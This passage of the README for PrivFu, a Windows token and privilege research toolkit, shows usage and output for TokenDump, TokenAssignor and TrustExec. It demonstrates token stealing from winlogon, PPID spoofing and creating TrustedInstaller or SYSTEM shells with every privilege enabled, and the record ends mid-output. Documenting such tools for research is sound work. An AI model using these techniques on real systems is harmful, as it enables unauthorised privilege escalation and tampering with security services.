ID : 0x0000000000063D9A\nAuthentication ID : 0x000000000001DFE5\nOriginal ID : 0x00000000000003E7\nModified ID : 0x0000000000063D24\nIntegrity Level : Low\nProtection Level : N/A\nSession ID : 1\nElevation Type : Limited\nMandatory Policy : NoWriteUp\nElevated : False\nAppContainer : True\nTokenFlags : VirtualizeAllowed, IsFiltered, LowBox\nAppContainer Name : microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\nAppContainer SID : S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000\nAppContainer Number : 2\nHas Linked Token : True\nToken Source : User32\nToken Source ID : 0x000000000001DE9D\n\n\n PRIVILEGES INFORMATION\n ----------------------\n\n Privilege Name State\n ============================= =========================\n SeChangeNotifyPrivilege EnabledByDefault, Enabled\n SeIncreaseWorkingSetPrivilege Disabled\n\n\n GROUP INFORMATION\n -----------------\n\n Group Name Attributes\n ============================================================= =============================================\n dev22h2\\None Mandatory, EnabledByDefault, Enabled\n Everyone Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\Local account and member of Administrators group UseForDenyOnly\n BUILTIN\\Administrators UseForDenyOnly\n BUILTIN\\Users Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\INTERACTIVE Mandatory, EnabledByDefault, Enabled\n CONSOLE LOGON Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\Authenticated Users Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\This Organization Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\Local account Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\LogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId\n LOCAL Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\NTLM Authentication Mandatory, EnabledByDefault, Enabled\n Mandatory Label\\Low Mandatory Level Integrity, IntegrityEnabled\n\n\n APPCONTAINER CAPABILITIES\n -------------------------\n\n Capability Name Flags\n ========================================================================== =======\n APPLICATION PACKAGE AUTHORITY\\Your Internet connection Enabled\n APPLICATION PACKAGE AUTHORITY\\Your home or work networks Enabled\n NAMED CAPABILITIES\\PackageQuery Enabled\n NAMED CAPABILITIES\\ActivitySystem Enabled\n NAMED CAPABILITIES\\PreviewStore Enabled\n NAMED CAPABILITIES\\CortanaPermissions Enabled\n NAMED CAPABILITIES\\AppointmentsSystem Enabled\n NAMED CAPABILITIES\\TeamEditionExperience Enabled\n NAMED CAPABILITIES\\ShellExperience Enabled\n NAMED CAPABILITIES\\PackageContents Enabled\n NAMED CAPABILITIES\\VisualElementsSystem Enabled\n NAMED CAPABILITIES\\UserAccountInformation Enabled\n NAMED CAPABILITIES\\ActivityData Enabled\n NAMED CAPABILITIES\\CloudStore Enabled\n NAMED CAPABILITIES\\TargetedContent Enabled\n NAMED CAPABILITIES\\StoreAppInstall Enabled\n NAMED CAPABILITIES\\StoreLicenseManagement Enabled\n NAMED CAPABILITIES\\CortanaSettings Enabled\n NAMED CAPABILITIES\\DependencyTarget Enabled\n NAMED CAPABILITIES\\SearchSettings Enabled\n NAMED CAPABILITIES\\CellularData Enabled\n NAMED CAPABILITIES\\WifiData Enabled\n PACKAGE CAPABILITY\\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy Enabled\n NAMED CAPABILITIES\\AccessoryManager Enabled\n NAMED CAPABILITIES\\UserAccountInformation Enabled\n\n\n DACL INFORMATION\n ----------------\n\n Account Name Access Flags Type\n ======================================================= =========================== ===== =============\n dev22h2\\user GenericAll None AccessAllowed\n NT AUTHORITY\\SYSTEM GenericAll None AccessAllowed\n NT AUTHORITY\\LogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed\n microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy GenericAll None AccessAllowed\n\n\n SECURITY ATTRIBUTES INFORMATION\n -------------------------------\n\n [*] WIN://SYSAPPID\n Flags : None\n Type : String\n Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy\n Value[0x01] : App\n Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\n\n [*] WIN://PKG\n Flags : None\n Type : UInt64\n Value[0x00] : 0x0000000200000001\n\n [*] WIN://PKGHOSTID\n Flags : None\n Type : UInt64\n Value[0x00] : 0x1000000000000001\n\n [*] TSA://ProcUnique\n Flags : NonInheritable, Unique\n Type : UInt64\n Value[0x00] : 0x0000000000000041\n Value[0x01] : 0x0000000000063D9B\n\n\n\n[Linked Token Information for StartMenuExperienceHost.exe (PID: 5996)]\n\nToken User : dev22h2\\user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)\nToken Owner : BUILTIN\\Administrators (SID: S-1-5-32-544)\nPrimary Group : dev22h2\\None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)\nToken Type : Impersonation\nImpersonation Level : Identification\nToken ID : 0x000000000016ECE6\nAuthentication ID : 0x000000000001DF83\nOriginal ID : 0x00000000000003E7\nModified ID : 0x000000000001DFE4\nIntegrity Level : High\nProtection Level : N/A\nSession ID : 1\nElevation Type : Full\nMandatory Policy : NoWriteUp, NewProcessMin\nElevated : True\nAppContainer : False\nTokenFlags : NotLow\nToken Source : User32\nToken Source ID : 0x000000000001DE9D\n\n\n PRIVILEGES INFORMATION\n ----------------------\n\n Privilege Name State\n ========================================= =========================\n SeIncreaseQuotaPrivilege Disabled\n SeSecurityPrivilege Disabled\n SeTakeOwnershipPrivilege Disabled\n SeLoadDriverPrivilege Disabled\n SeSystemProfilePrivilege Disabled\n SeSystemtimePrivilege Disabled\n SeProfileSingleProcessPrivilege Disabled\n SeIncreaseBasePriorityPrivilege Disabled\n SeCreatePagefilePrivilege Disabled\n SeBackupPrivilege Disabled\n SeRestorePrivilege Disabled\n SeShutdownPrivilege Disabled\n SeDebugPrivilege Disabled\n SeSystemEnvironmentPrivilege Disabled\n SeChangeNotifyPrivilege EnabledByDefault, Enabled\n SeRemoteShutdownPrivilege Disabled\n SeUndockPrivilege Disabled\n SeManageVolumePrivilege Disabled\n SeImpersonatePrivilege EnabledByDefault, Enabled\n SeCreateGlobalPrivilege EnabledByDefault, Enabled\n SeIncreaseWorkingSetPrivilege Disabled\n SeTimeZonePrivilege Disabled\n SeCreateSymbolicLinkPrivilege Disabled\n SeDelegateSessionUserImpersonatePrivilege Disabled\n\n\n GROUP INFORMATION\n -----------------\n\n Group Name Attributes\n ============================================================= =============================================\n dev22h2\\None Mandatory, EnabledByDefault, Enabled\n Everyone Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\Local account and member of Administrators group Mandatory, EnabledByDefault, Enabled\n BUILTIN\\Administrators Mandatory, EnabledByDefault, Enabled, Owner\n BUILTIN\\Users Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\INTERACTIVE Mandatory, EnabledByDefault, Enabled\n CONSOLE LOGON Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\Authenticated Users Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\This Organization Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\Local account Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\LogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId\n LOCAL Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\NTLM Authentication Mandatory, EnabledByDefault, Enabled\n Mandatory Label\\High Mandatory Level Integrity, IntegrityEnabled\n\n\n DACL INFORMATION\n ----------------\n\n Account Name Access Flags Type\n ==================================== =========================== ===== =============\n BUILTIN\\Administrators GenericAll None AccessAllowed\n NT AUTHORITY\\SYSTEM GenericAll None AccessAllowed\n NT AUTHORITY\\LogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed\n\n\n SECURITY ATTRIBUTES INFORMATION\n -------------------------------\n\n [*] WIN://SYSAPPID\n Flags : None\n Type : String\n Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy\n Value[0x01] : App\n Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\n\n [*] WIN://PKG\n Flags : None\n Type : UInt64\n Value[0x00] : 0x0000000200000001\n\n [*] WIN://PKGHOSTID\n Flags : None\n Type : UInt64\n Value[0x00] : 0x1000000000000001\n\n [*] TSA://ProcUnique\n Flags : NonInheritable, Unique\n Type : UInt64\n Value[0x00] : 0x0000000000000041\n Value[0x01] : 0x0000000000063D9B\n\n\n[*] Done.\n```\n\nIf you set handle value in a specific process as `-v` option and the PID as `-p` option as well as `-s` flag, this tool get verbose information for the handle as follows:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -s -p 7012 -v 0x23C -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to dump token handle information.\n\n[Token Information for Handle 0x23C of msdtc.exe (PID: 7012)]\n\nToken User : NT AUTHORITY\\NETWORK SERVICE (SID: S-1-5-20)\nToken Owner : NT AUTHORITY\\NETWORK SERVICE (SID: S-1-5-20)\nPrimary Group : NT AUTHORITY\\NETWORK SERVICE (SID: S-1-5-20)\nToken Type : Primary\nImpersonation Level : Anonymous\nToken ID : 0x000000000007DF17\nAuthentication ID : 0x00000000000003E4\nOriginal ID : 0x00000000000003E7\nModified ID : 0x000000000007DEE2\nIntegrity Level : System\nProtection Level : N/A\nSession ID : 0\nElevation Type : Default\nMandatory Policy : NoWriteUp, NewProcessMin\nElevated : False\nAppContainer : False\nTokenFlags : IsFiltered, NotLow\nHas Linked Token : False\nToken Source : N/A\nToken Source ID : N/A\n\n\n PRIVILEGES INFORMATION\n ----------------------\n\n Privilege Name State\n ======================= =========================\n SeChangeNotifyPrivilege EnabledByDefault, Enabled\n SeCreateGlobalPrivilege EnabledByDefault, Enabled\n\n\n GROUP INFORMATION\n -----------------\n\n Group Name Attributes\n ====================================== ====================================================\n Mandatory Label\\System Mandatory Level Integrity, IntegrityEnabled\n Everyone Mandatory, EnabledByDefault, Enabled\n BUILTIN\\Users Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\SERVICE Mandatory, EnabledByDefault, Enabled\n CONSOLE LOGON Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\Authenticated Users Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\This Organization Mandatory, EnabledByDefault, Enabled\n NT SERVICE\\MSDTC EnabledByDefault, Enabled, Owner\n NT AUTHORITY\\LogonSessionId_0_515780 Mandatory, EnabledByDefault, Enabled, Owner, LogonId\n LOCAL Mandatory, EnabledByDefault, Enabled\n\n\n DACL INFORMATION\n ----------------\n\n Account Name Access Flags Type\n =================== =========== ===== =============\n NT AUTHORITY\\SYSTEM GenericAll None AccessAllowed\n OWNER RIGHTS ReadControl None AccessAllowed\n NT SERVICE\\MSDTC GenericAll None AccessAllowed\n\n\n SECURITY ATTRIBUTES INFORMATION\n -------------------------------\n\n [*] TSA://ProcUnique\n Flags : NonInheritable, Unique\n Type : UInt64\n Value[0x00] : 0x0000000000000070\n Value[0x01] : 0x000000000007DF18\n\n\n[*] Done.\n```\n\nTo investigate impersonate token applied to thread, set the thread ID as `-t` option as follows:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -T -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate impersonated threads.\n\n PID TID Session Process Name Token User Integrity Impersonation Level\n==== ==== ======= ============ =================== ========= ===================\n1952 2000 0 svchost.exe NT AUTHORITY\\SYSTEM System Impersonation\n1952 2300 0 svchost.exe NT AUTHORITY\\SYSTEM System Impersonation\n3516 4348 0 svchost.exe NT AUTHORITY\\SYSTEM System Impersonation\n3516 4656 0 svchost.exe NT AUTHORITY\\SYSTEM System Impersonation\n\n[+] Got 4 thread(s).\n[*] Found 1 account(s).\n [*] NT AUTHORITY\\SYSTEM\n[*] Done.\n\n\nC:\\Dev\u003e.\\TokenDump.exe -s -p 3516 -t 4656 -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to dump thread token information.\n\n[Token Information for svchost.exe (PID: 3516, TID: 4656)]\n\nToken User : NT AUTHORITY\\SYSTEM (SID: S-1-5-18)\nToken Owner : NT AUTHORITY\\SYSTEM (SID: S-1-5-18)\nPrimary Group : NT AUTHORITY\\SYSTEM (SID: S-1-5-18)\nToken Type : Impersonation\nImpersonation Level : Impersonation\nToken ID : 0x0000000000038CC4\nAuthentication ID : 0x00000000000003E7\nOriginal ID : 0x00000000000003E7\nModified ID : 0x000000000002CE61\nIntegrity Level : System\nProtection Level : N/A\nSession ID : 0\nElevation Type : Default\nMandatory Policy : NoWriteUp, NewProcessMin\nElevated : True\nAppContainer : False\nTokenFlags : IsFiltered, NotLow, EnforceRedirectionTrust\nHas Linked Token : False\nToken Source : N/A\nToken Source ID : N/A\n\n\n PRIVILEGES INFORMATION\n ----------------------\n\n Privilege Name State\n ============================= =========================\n SeAssignPrimaryTokenPrivilege Disabled\n SeTcbPrivilege EnabledByDefault, Enabled\n SeSecurityPrivilege Disabled\n SeSystemProfilePrivilege EnabledByDefault, Enabled\n SeDebugPrivilege EnabledByDefault, Enabled\n SeChangeNotifyPrivilege EnabledByDefault, Enabled\n SeImpersonatePrivilege EnabledByDefault, Enabled\n SeCreateGlobalPrivilege EnabledByDefault, Enabled\n\n\n GROUP INFORMATION\n -----------------\n\n Group Name Attributes\n ====================================== ====================================================\n Mandatory Label\\System Mandatory Level Integrity, IntegrityEnabled\n Everyone Mandatory, EnabledByDefault, Enabled\n BUILTIN\\Users Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\SERVICE Mandatory, EnabledByDefault, Enabled\n CONSOLE LOGON Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\Authenticated Users Mandatory, EnabledByDefault, Enabled\n NT AUTHORITY\\This Organization Mandatory, EnabledByDefault, Enabled\n NT SERVICE\\DiagTrack EnabledByDefault, Enabled, Owner\n NT AUTHORITY\\LogonSessionId_0_180260 Mandatory, EnabledByDefault, Enabled, Owner, LogonId\n LOCAL Mandatory, EnabledByDefault, Enabled\n BUILTIN\\Administrators EnabledByDefault, Enabled, Owner\n\n\n DACL INFORMATION\n ----------------\n\n Account Name Access Flags Type\n ==================== =========== ===== =============\n NT AUTHORITY\\SYSTEM GenericAll None AccessAllowed\n OWNER RIGHTS ReadControl None AccessAllowed\n NT SERVICE\\DiagTrack GenericAll None AccessAllowed\n\n\n SECURITY ATTRIBUTES INFORMATION\n -------------------------------\n\n [*] TSA://ProcUnique\n Flags : NonInheritable, Unique\n Type : UInt64\n Value[0x00] : 0x0000000000000047\n Value[0x01] : 0x000000000002C0FA\n\n\n[*] Done.\n```\n\n\n## TokenAssignor\n\n[Back to Top](#privfu)\n\n[Project](./TokenAssignor/)\n\nThis tool is to learh how to assign primary token:\n\n```\nPS C:\\Dev\u003e .\\TokenAssignor.exe\n\nTokenAssignor - Tool to execute token assigned process.\n\nUsage: TokenAssignor.exe [Options]\n\n -h, --help : Displays this help message.\n -c, --command : Specifies a command to execute. Default is cmd.exe.\n -m, --method : Specifies a method ID (0 - 3).\n -p, --pid : Specifies a source PID for token stealing.\n\n[!] -m option is required.\n```\n\nThis tool tries to steal token from a specified process and execute a token assigned process.\nMost of methods require administrative privileges.\nTo execute a token assigned process with `CreateProcessAsUser` API, set `-m` option to `0`:\n\n```\nPS C:\\Dev\u003e Get-Process winlogon\n\nHandles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName\n------- ------ ----- ----- ------ -- -- -----------\n 270 13 2452 10108 0.33 688 1 winlogon\n\nPS C:\\Dev\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n==================== =============================================\ndesktop-5ohmobj\\user S-1-5-21-1955100404-698441589-1496171011-1001\nPS C:\\Dev\u003e .\\TokenAssignor.exe -p 688 -m 0\n\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Got a primary token from PID 688 (Handle = 0x68).\n[+] Got a impersonation token from winlogon.exe (Handle = 0x2E0).\n[+] Impersonation as winlogon.exe is successful.\n[+] \"C:\\Windows\\system32\\cmd.exe\" is executed successfully (PID = 9552).\n[*] User of the created process is NT AUTHORITY\\SYSTEM (SID: S-1-5-18).\nMicrosoft Windows [Version 10.0.22631.2428]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\Dev\u003ewhoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n=================== ========\nnt authority\\system S-1-5-18\n```\n\nWhen set `-m` option to `1`, this tool tries to create a suspended process and update the primary token to a stolen token.\nThis method cannot be used for changing Session ID due to kernel restriction.\nKernel forces token's Session ID to be matched with Session ID for `_EPROCESS`:\n\n```\nPS C:\\Dev\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n==================== =============================================\ndesktop-5ohmobj\\user S-1-5-21-1955100404-698441589-1496171011-1001\nPS C:\\Dev\u003e .\\TokenAssignor.exe -p 688 -m 1\n\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Got a primary token from PID 688 (Handle = 0x2C8).\n[+] Got a impersonation token from winlogon.exe (Handle = 0x2D8).\n[+] Impersonation as winlogon.exe is successful.\n[+] Suspended \"C:\\Windows\\system32\\cmd.exe\" is executed successfully (PID = 9968).\n[*] Current user of the suspended process is DESKTOP-5OHMOBJ\\user (SID: S-1-5-21-1955100404-698441589-1496171011-1001)\n[+] Primary token for the suspended process is updated successfully.\n[*] Current user of the suspended process is NT AUTHORITY\\SYSTEM (SID: S-1-5-18)\n[*] Resuming the suspended process.\nMicrosoft Windows [Version 10.0.22631.2428]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\Dev\u003ewhoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n=================== ========\nnt authority\\system S-1-5-18\n```\n\nIf set `-m` option is set to `2`, creates a new token assigned process with Secondary Logon Service:\n\n```\nPS C:\\Dev\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n==================== =============================================\ndesktop-5ohmobj\\user S-1-5-21-1955100404-698441589-1496171011-1001\nPS C:\\Dev\u003e .\\TokenAssignor.exe -p 688 -m 2\n\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Got a primary token from PID 688 (Handle = 0x2C4).\n[+] \"C:\\Windows\\system32\\cmd.exe\" is executed successfully (PID = 5832).\n[*] User of the created process is NT AUTHORITY\\SYSTEM (SID: S-1-5-18).\n\nPS C:\\Dev\u003e\n\nMicrosoft Windows [Version 10.0.22631.2428]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\Dev\u003ewhoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n=================== ========\nnt authority\\system S-1-5-18\n```\n\nIf set `-m` option is set to `3`, creates a new token assigned process with PPID spoofing method:\n\n```\nPS C:\\Dev\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n==================== =============================================\ndesktop-5ohmobj\\user S-1-5-21-1955100404-698441589-1496171011-1001\nPS C:\\Dev\u003e .\\TokenAssignor.exe -p 688 -m 3\n\n[+] SeDebugPrivilege is enabled successfully.\n[+] Got a handle from PID 688 (Handle = 0x2C4).\n[+] Thread attribute is built successfully.\n[+] \"C:\\Windows\\system32\\cmd.exe\" is executed successfully (PID = 4852).\n[*] User of the created process is NT AUTHORITY\\SYSTEM (SID: S-1-5-18).\n\nPS C:\\Dev\u003e\n\n\nMicrosoft Windows [Version 10.0.22631.2428]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\Dev\u003ewhoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n=================== ========\nnt authority\\system S-1-5-18\n```\n\n\n## TrustExec\n\n[Back to Top](#privfu)\n\n[Project](./TrustExec)\n\nThis tool is to execute process as `NT SERVICE\\TrustedInstaller` group account.\nOriginal PoC is [Grzegorz Tworek](https://twitter.com/0gtweet)'s [TrustedInstallerCmd2.c](https://github.com/gtworek/PSBits/blob/master/VirtualAccounts/TrustedInstallerCmd2.c).\nI ported it to C# and rebuilt it as a tool.\nMost of operations require administrative privilege (`SeDebugPrivilege`, `SeImpersonatePrivilege` and High Mandatory Level):\n\n```\nPS C:\\Dev\u003e .\\TrustExec.exe\n\nTrustExec - Tool to create TrustedInstaller process.\n\nUsage: TrustExec.exe [Options]\n\n -h, --help : Displays this help message.\n -l, --lookup : Flag to lookup account name or SID.\n -n, --new-console : Flag to create new console. Use with -x flag.\n -x, --exec : Flag to execute command.\n -a, --account : Specifies account name to lookup.\n -c, --command : Specifies command to execute. Default is cmd.exe.\n -e, --extra : Specifies command to execute. Default is cmd.exe.\n -m, --method : Specifies method ID. Default is 0 (NtCreateToken method).\n -s, --sid : Specifies SID to lookup.\n\nAvailable Method IDs:\n\n + 0 - Leverages NtCreateToken syscall.\n + 1 - Leverages virtual logon.\n + 2 - Leverages service logon.\n + 3 - Leverages S4U logon.\n + 4 - Leverages TrustedInstaller service.\n```\n\nFor this module, 2 techniques are implemeted.\nWe can specfy a method with `-m` option.\nThe value for `-m` option can be a integer from `0` to `4`.\nFor example, if you set `-m` option to `0`, this tool try to get `TrustedInstaller` token with `NtCreateToken`:\n\n```\nPS C:\\Dev\u003e .\\TrustExec.exe -m 0 -x -c powershell\n\n[*] NtCreateToken syscall method is selected.\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Impersonation as smss.exe is successful.\n[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.\n[+] SeCreateTokenPrivilege is enabled successfully for current thread.\n[+] SeImpersonatePrivilege is enabled successfully for current thread.\n[+] Got a TrustedInstaller token (Handle = 0xE8).\n[+] Got a token assigned process (PID: 2832).\nWindows PowerShell\nCopyright (C) Microsoft Corporation. All rights reserved.\n\nInstall the latest PowerShell for new features and improvements! https://aka.ms/PSWindows\n\nPS C:\\Dev\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name SID\n=================== ========\nnt authority\\system S-1-5-18\nPS C:\\Dev\u003e whoami /priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State\n========================================= ================================================================== =======\nSeCreateTokenPrivilege Create a token object Enabled\nSeAssignPrimaryTokenPrivilege Replace a process level token Enabled\nSeLockMemoryPrivilege Lock pages in memory Enabled\nSeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled\nSeMachineAccountPrivilege Add workstations to domain Enabled\nSeTcbPrivilege Act as part of the operating system Enabled\nSeSecurityPrivilege Manage auditing and security log Enabled\nSeTakeOwnershipPrivilege Take ownership of files or other objects Enabled\nSeLoadDriverPrivilege Load and unload device drivers Enabled\nSeSystemProfilePrivilege Profile system performance Enabled\nSeSystemtimePrivilege Change the system time Enabled\nSeProfileSingleProcessPrivilege Profile single process Enabled\nSeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled\nSeCreatePagefilePrivilege Create a pagefile Enabled\nSeCreatePermanentPrivilege Create permanent shared objects Enabled\nSeBackupPrivilege Back up files and directories Enabled\nSeRestorePrivilege Restore files and directories Enabled\nSeShutdownPrivilege Shut down the system Enabled\nSeDebugPrivilege Debug programs Enabled\nSeAuditPrivilege Generate security audits Enabled\nSeSystemEnvironmentPrivilege Modify firmware environment values Enabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeRemoteShutdownPrivilege Force shutdown from a remote system Enabled\nSeUndockPrivilege Remove computer from docking station Enabled\nSeSyncAgentPrivilege Synchronize directory service data Enabled\nSeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled\nSeManageVolumePrivilege Perform volume maintenance tasks Enabled\nSeImpersonatePrivilege Impersonate a client after authentication Enabled\nSeCreateGlobalPrivilege Create global objects Enabled\nSeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled\nSeRelabelPrivilege Modify an object label Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Enabled\nSeTimeZonePrivilege Change the time zone Enabled\nSeCreateSymbolicLinkPrivilege Create symbolic links Enabled\nSeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled\nPS C:\\Dev\u003e whoami /groups\n\nGROUP INFORMATION\n-----------------\n\nGroup Name Type SID Attributes\n====================================== ================ ============================================================== ==================================================\nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group\nLOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group\nCONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\nNT SERVICE\\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner\nMandatory Label\\System Mandatory Level Label S-1-16-16384\n```\n\nIf you want to create process with new console, set `-n` flag as follows:\n\n```\nPS C:\\Dev\u003e .\\TrustExec.exe -m 1 -x -c powershell -n\n\n[*] Virtual logon method is selected.\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Impersonation as smss.exe is successful.\n[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.\n[+] SeImpersonatePrivilege is enabled successfully for current thread.\n[+] SeTcbPrivilege is enabled successfully for current thread.\n[+] A virtual domain VirtualDomain is created successfully (SID: S-1-5-110).\n[+] A virtual account VirtualDomain\\VirtualAdmin is created successfully (SID: S-1-5-110-500).\n[+] Got a virtual logon token (Handle = 0xEC).\n[+] Got a token assigned process (PID: 23836).\n[+] VirtualDomain domain is removed successfully.\n```\n\nEach methods other than TrustedInstaller service method (ID for `-m` option is `4`) accept extra group SIDs with `-e` option.\nThe value format for `-e` option must be SDDL SID string.\nFor SID string separator, you can use comma as follows:\n\n```\nPS C:\\Dev\u003e .\\TrustExec.exe -m 0 -x -c powershell -e S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736,S-1-5-32-551\n\n[*] NtCreateToken syscall method is selected.\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Impersonation as smss.exe is successful.\n[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.\n[+] SeCreateTokenPrivilege is enabled successfully for current thread.\n[+] SeImpersonatePrivilege is enabled successfully for current thread.\n[+] Got a TrustedInstaller token (Handle = 0x30C).\n[+] Got a token assigned process (PID: 17500).\nWindows PowerShell\nCopyright (C) Microsoft Corporation. All rights reserved.\n\nInstall the latest PowerShell for new features and improvements! https://aka.ms/PSWindows\n\nPS C:\\Dev\u003e whoami /user\n\nGROUP INFORMATION\n-----------------\n\nGroup Name Type SID Attributes\n====================================== ================ =============================================================== ==================================================\nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group\nLOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group\nCONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Backup Operators Alias S-1-5-32-551 Enabled by default, Enabled group\nBUILTIN\\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\nNT SERVICE\\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner\nMandatory Label\\System Mandatory Level Label S-1-16-16384 \nNT SERVICE\\WinDefend Well-known group S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736 Ena","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdaem0nc0re%2FPrivFu","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdaem0nc0re%2FPrivFu","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdaem0nc0re%2FPrivFu/lists"}